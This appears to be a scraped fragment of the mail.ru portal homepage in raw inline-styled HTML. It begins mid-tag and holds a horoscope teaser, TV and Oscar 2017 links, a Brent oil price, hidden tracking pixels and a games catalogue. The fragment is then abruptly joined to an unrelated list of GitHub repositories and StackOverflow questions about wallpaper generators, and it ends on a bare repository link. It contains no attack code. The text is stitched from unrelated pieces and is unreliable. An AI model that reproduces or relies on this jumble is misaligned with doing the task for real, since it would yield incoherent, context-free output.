href="https://horo.mail.ru/prediction/libra/today/" name="clb1753709" class="horoscope__zodiac" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(34, 34, 34);">Весы —<span class="Apple-converted-space"> </span></a><a href="https://horo.mail.ru/prediction/libra/today/" name="clb1753709" class="horoscope__forecast__description" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(34, 34, 34);">сохраняйте спокойствие, даже если все идет не так, как вы ожидали. Этот день может преподнести…</a></div> </div> </div> </td> </tr> </tbody> </table> <table class="informers informers_second" style="margin: 0px; padding: 0px; vertical-align: baseline; font-size: 13px; border: 0px; border-spacing: 0px; border-collapse: collapse; width: 602px; table-layout: fixed;" cellspacing="0"> <tbody style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px;"> <tr style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px;"> <td class="informers__column informers__column_left" style="margin: 0px; padding: 0px 10px 0px 0px; vertical-align: bottom; font-size: 13px; border: 0px; position: relative; width: 189px;"> <div class="informers__column__inner" style="overflow: hidden; padding-bottom: 3px;"><a name="clb654944" href="https://tv.mail.ru/" class="informers__title" target="_blank" style="margin: 7px 0px 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 14px; transition: color 0.1s ease-out; text-decoration: none; white-space: nowrap; line-height: 16px; color: rgb(0, 119, 204); right: 10px; display: block;"><span class="informers__title__text" style="position: relative; display: inline-block;">ТВ программа</span></a></div> </td> <td class="informers__column informers__column_center" style="margin: 0px; padding: 0px 5px; vertical-align: bottom; font-size: 13px; border: 0px; position: relative; width: 153px;"> <div id="oil" class="informers__column__inner informers__column__inner_oil" style="overflow: hidden; padding-bottom: 3px;"><a id="oil:inner" title="Стоимость нефти марки Brent по данным торгов срочного рынка МБ" data-s="6559" data-b="12403154" class="quotations__item quotations__item_oil quotations__item_link" href="https://news.mail.ru/currency.html?type=lme&code=OIL2#lme" name="clb12403154" target="_blank" style="margin: 0px; padding: 7px 0px 0px; border-width: 1px 0px 0px; border-top-style: solid; border-right-style: initial; border-bottom-style: initial; border-left-style: initial; border-top-color: rgb(208, 208, 208); border-right-color: initial; border-bottom-color: initial; border-left-color: initial; border-image: initial; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; white-space: nowrap; display: block; float: left; text-decoration: none; color: rgb(34, 34, 34);"><span class="quotations__item__title" style="font-size: 13px; margin-right: 4px; color: rgb(0, 119, 204);">Нефть</span><span id="oil:item:brent" data-updatable="true" data-value="56.00" class="quotations__item__hider" style="transition: opacity 0.15s ease;"><span class="quotations__item__rate" style="color: rgb(34, 34, 34);">56.00</span><span class="quotations__item__increment quotations__item__increment_plus" style="padding-left: 4px; color: green; font-size: 11px;">+0.41</span></span></a></div> </td> <td class="informers__column informers__column_right" style="margin: 0px; padding: 0px 0px 0px 10px; vertical-align: bottom; font-size: 13px; border: 0px; position: relative; width: 230px;"> <div class="informers__column__inner informers__column__inner_tizer" style="overflow: hidden; margin-left: -12px; padding-left: 12px; padding-bottom: 3px;"><a class="informers__title" target="_blank" name="clb25106013" href="https://afisha.mail.ru/awards/oscar/2017/" style="margin: 7px 0px 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 14px; transition: color 0.1s ease-out; text-decoration: none; white-space: nowrap; line-height: 16px; color: rgb(0, 119, 204); left: 10px; display: block;"><span class="informers__title__text" style="position: relative; display: inline-block;">Оскар 2017</span></a></div> </td> </tr> </tbody> </table> </div> </div> <div id="layout:rightcol" class="layout__rightcol" style="position: relative; float: left; margin-left: -300px; width: 300px;"> <table style="margin: 0px; padding: 0px; vertical-align: baseline; font-size: 13px; border: 0px; border-spacing: 0px; border-collapse: collapse;" width="100%"> <tbody style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px;"> <tr style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px;"> <td class="w-banner" id="banner-placeholder" style="margin: 0px; padding: 0px; vertical-align: top; font-size: 13px; border: 0px; height: 300px;"> <div id="slot_4499" class="banner " style="height: 300px; position: relative; width: 300px; overflow: hidden;"> <div class="mailru-visibility-check" id="mailru148600681683125234"><img src="https://rs.mail.ru/d1312452.gif?test_id=317&sz=&rnd=136248319&ts=1485974419&sz=" alt="" style="margin: 0px; padding: 0px; vertical-align: baseline; font-size: 13px; border: 0px; width: 0px; height: 0px; position: absolute; visibility: hidden;" /></div> </div> </td> </tr> </tbody> </table> <div class="games games_with-categories" style="margin-top: 12px;"> <div class="games__title" style="margin-bottom: 4px;"><a href="https://games.mail.ru/?from=main_nano" class="games__title__link" name="clb1750972" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 18px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(0, 119, 204); line-height: 22px;"><span class="games__title__link__text">Игры</span></a></div> <img src="https://rs.mail.ru/d25041778.gif?test_id=317&sz=0&rnd=206103281&ts=1485974409&sz=0" alt="" style="margin: 0px; padding: 0px; vertical-align: baseline; font-size: 13px; border: 0px; width: 0px; height: 0px; position: absolute; visibility: hidden;" /> <div class="games__top-games" style="margin-bottom: 2px; white-space: nowrap; vertical-align: top;"><a name="n245107044sz0" class="games__top-games__item games__top-games__item_first" href="http://1l-go.mail.ru/r/adid/2243075_2008892/pid/101459/pof/1/f/3/" title="Зимний Кутеж" style="margin: 0px 0px 4px; padding: 0px; border: 0px; vertical-align: top; font-size: 13px; transition: color 0.1s ease-out; display: inline-block; width: 146px; text-decoration: none; color: rgb(0, 119, 204);"><span class="games__top-games__item__title" style="display: block; max-width: 100%; margin-top: 5px; margin-bottom: 4px; overflow: hidden; text-overflow: ellipsis;">Зимний Кутеж</span></a><a name="n245107044sz0" class="games__top-games__item" href="http://1l-go.mail.ru/r/adid/2243075_2008892/pid/101459/pof/1/f/3/" style="margin: 0px 0px 4px 8px; padding: 0px; border: 0px; vertical-align: top; font-size: 13px; transition: color 0.1s ease-out; display: inline-block; width: 146px; text-decoration: none; color: rgb(0, 119, 204);"></a></div> <table class="games__catalogue" style="margin: -1px 0px 0px; padding: 0px; vertical-align: baseline; font-size: 13px; border: 0px; border-spacing: 0px; border-collapse: collapse; width: 300px;" cellspacing="0"> <tbody style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px;"> <tr style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px;"> <td class="games__catalogue__col games__catalogue__col_left" style="margin: 0px; padding: 0px; vertical-align: top; font-size: 13px; border: 0px; width: 146px;"> <div class="games__catalogue__item games__catalogue__item_odd" style="line-height: 20px;"><a name="n245107049sz0" href="http://games.mail.ru/play/client/best/?from=mainclient_nano" class="games__catalogue__item__link" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(0, 119, 204);">Клиентские</a><span class="games__catalogue__item__info" style="margin-left: 5px; color: rgb(106, 106, 106);">13</span></div> <div class="games__catalogue__item games__catalogue__item_even" style="line-height: 20px;"><a name="n245107050sz0" href="https://minigames.mail.ru/?from=mailru" class="games__catalogue__item__link" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(0, 119, 204);">Мини-игры</a><span class="games__catalogue__item__info" style="margin-left: 5px; color: rgb(106, 106, 106);">28</span></div> </td> <td class="games__catalogue__col games__catalogue__col_right" style="margin: 0px; padding: 0px 0px 0px 8px; vertical-align: top; font-size: 13px; border: 0px;"> <div class="games__catalogue__item games__catalogue__item_odd" style="line-height: 20px;"><a name="n245107051sz0" href="http://games.mail.ru/play/browser/best/?from=mainbrowser_nano" class="games__catalogue__item__link" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(0, 119, 204);">Браузерные</a><span class="games__catalogue__item__info" style="margin-left: 5px; color: rgb(106, 106, 106);">30</span></div> <div class="games__catalogue__item games__catalogue__item_even" style="line-height: 20px;"><a name="n245107052sz0" href="http://games.mail.ru/#popular" class="games__catalogue__item__link" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(0, 119, 204);">Популярные</a><span class="games__catalogue__item__info" style="margin-left: 5px; color: rgb(106, 106, 106);">24</span></div> </td> </tr>
GitHub Repo
https://github.com/slastra/bgen
slastra/bgen
Generate wallpapers from terminal color palettes. 365+ Gogh themes, 11 pattern generators, 13 glitch effects, slot machine randomizer.
StackOverflow
https://stackoverflow.com/questions/33303908/specify-iphone-6-to-use-1x-image-in-xcode
Specify iPhone 6 to use @1x image in Xcode
Tags: ios, xcode, background-image, iphone-6, xcasset
StackOverflow
https://stackoverflow.com/questions/34443819/how-do-i-keep-my-own-animated-kde-wallpapers-from-running-together
How do I keep my own animated KDE wallpapers from running together?
Tags: c++, animation, wallpaper, kde-plasma
GitHub Repo
https://github.com/icherniukh/wp-generator
icherniukh/wp-generator
OKLCH wallpaper slot machine, powered by Thomas Bayes
GitHub Repo
https://github.com/ZoltCyber/file.js